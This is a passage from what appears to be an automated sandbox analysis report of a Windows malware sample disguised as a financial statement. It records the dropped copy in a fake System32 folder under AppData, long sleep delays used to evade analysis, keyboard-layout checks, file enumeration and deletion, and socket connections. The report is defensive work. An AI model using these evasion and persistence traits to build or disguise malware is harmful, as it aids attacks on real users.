std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_004113C9
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeWindow / User API: threadDelayed 599
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 6988Thread sleep count: 50 > 30
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 6848Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 4620Thread sleep count: 599 > 30
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe TID: 4620Thread sleep time: -5990000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh7_2_00405156
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh7_2_00405156
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh25_2_00405156
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh25_2_00405156
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00404C0A
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040751B
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr7_2_00410586
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040728F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE7_2_0040477E
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00403325
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_00412BEE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00404C0A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040751B
